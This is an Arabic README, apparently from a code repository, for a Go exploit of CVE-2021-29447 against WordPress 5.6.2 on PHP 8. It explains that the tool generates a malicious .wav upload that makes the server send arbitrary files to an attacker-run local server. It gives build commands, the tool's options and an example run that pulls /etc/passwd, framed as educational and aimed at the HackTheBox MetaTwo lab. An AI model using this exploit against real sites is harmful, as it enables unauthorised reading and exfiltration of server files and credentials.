
استغلال قائم على Go لـ CVE-2021-29447 يستهدف WordPress 5.6.2 مع PHP 8. يولد حمولة .wav خبيثة لاسترداد ملفات عشوائية من الخادم عبر رفع الوسائط، ويتطلب وصول wp-admin أساسي.
لأغراض تعليمية فقط.
من المفترض أن تكون هذه الأداة أداة مريحة حقاً للحصول على أي ملف من خادم يعمل بنظام WordPress 5.6.2 و php8. (انظر https://wpscan.com/vulnerability/cbbe6c17-b24e-4be4-8937-c78472a138b5)
كل ما تحتاجه هو وصول أساسي إلى wp-admin والقدرة على رفع ملف وسائط.
سيقوم الاستغلال بتوليد حمولة ملف .wav لرفعها باستخدام wp-admin.
ثم يستخدم الخادم الخلفي الخاص بالاستغلال ليمنحك الملف المطلوب مباشرة على وحدة التحكم الخاصة بك.
الاستخدام الأمثل هو جهاز HackTheBox - metatwo https://www.hackthebox.com/machines/metatwo

$ go build
$ chmod +x exploit_cve-2021-29447
$ ./exploit_cve-2021-29447 --help
Usage of ./exploit_cve-2021-29447:
-local-server-ip string
Use local server ip where a local server will be set
-local-server-port int
Use local server port to run local server on
-o string
Output file to save exploit's result
-target-path string
Use target path to point on file you want to get from target server
$ ./exploit_cve-2021-29447 -local-server-ip=<your ip address> -target-path=/etc/passwd